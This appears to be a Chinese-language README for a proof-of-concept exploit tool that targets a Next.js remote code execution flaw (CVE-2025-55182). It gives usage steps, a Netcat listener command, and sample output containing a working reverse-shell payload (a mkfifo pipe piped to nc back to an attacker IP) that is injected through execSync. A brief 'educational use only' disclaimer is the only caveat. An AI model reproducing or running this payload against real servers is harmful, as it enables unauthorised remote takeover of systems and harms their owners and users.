这是一个易于使用的PoC脚本,用于利用React2Shell-CVE-2025-55182 Nextjs漏洞。这将有助于获得一个反向shell。
🚀 React2Shell - (CVE-2025–55182) 漏洞利用脚本
🔥 简介
此仓库包含一个针对 React2Shell 漏洞(CVE-2025–55182)的利用脚本,该漏洞针对一种特定的 Node.js 原型污染,可导致远程代码执行(RCE)。
该脚本专门设计用于通过向易受攻击的应用程序注入恶意载荷来建立 Netcat 反向 Shell 连接。
⚠️ 免责声明
此工具仅供教育和研究目的使用。
⚙️ 前置条件
- Python 3.x
requests库安装
你可以使用
pip安装所需的 Python 依赖项:pip install requests
🖥️ 使用方法
该脚本是一个用于获取反向 Shell 的专用工具,需要3个主要参数:目标URL(
-u)、你的本地IP地址(-l)和监听端口(-p)。1. 启动你的监听器
在运行利用脚本之前,你必须在本地机器上设置一个 Netcat 监听器,以捕获传入的反向 Shell 连接。
# Start Netcat listener on port 9001 (or your custom port) nc -lvnp 90012. 运行利用脚本
执行脚本,提供必需的参数。如果省略端口(
-p),则默认为 9001。
使用示例
以
http://192.168.1.100:3000/为目标,并连接回你位于192.168.1.5:4444的监听器:python react2shell.py -u http://192.168.1.100:3000 -l 192.168.1.5 -p 4444预期输出
该利用脚本在目标上使用
execSync函数,该函数通常会阻塞服务器进程。因此,读取超时是命令成功执行的预期标志。### 🔥 React2Shell - (CVE-2025–55182) ### By Hasa [*] Target URL (-u): [http://192.168.1.100:3000/](http://192.168.1.100:3000/) [*] Local IP (-l): 192.168.1.5 [*] Port (-p): 4444 [*] Command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.1.5 4444 >/tmp/f [*] Sending payload... [+] [+] Attack may be Successful! Check your Netcat Listner.如果成功,你将看到 Shell 连接到你的 Netcat 监听器。
🖼️ 帮助菜单
不带参数运行脚本会显示横幅和强制使用说明:
python react2shell.py输出:
### 🔥 React2Shell - (CVE-2025–55182) ### By Hasa usage: react2shell.py [-h] -u URL -l LOCAL_IP [-p PORT] Educational Purposes Only!!! options: -h, --help show this help message and exit -u URL, --url URL (REQUIRED) The target URL (Ex: "[http://example.com:3000](http://example.com:3000)") -l LOCAL_IP, --local-ip LOCAL_IP (REQUIRED) Listner or Attacker IP (Ex: "192.168.100.1") -p PORT, --port PORT Listner Port (Default: 9001)
![]()
| 标志 | 参数 | 描述 | 示例 |
|---|
-u | --url | (必填) 易受攻击目标完整的URL。 | http://192.168.1.100:3000 |
-l | --local-ip | (必填) 你的攻击者/监听器IP地址。 | 192.168.1.5 |
-p | --port | 你的监听器正在运行的端口。 | 4444 |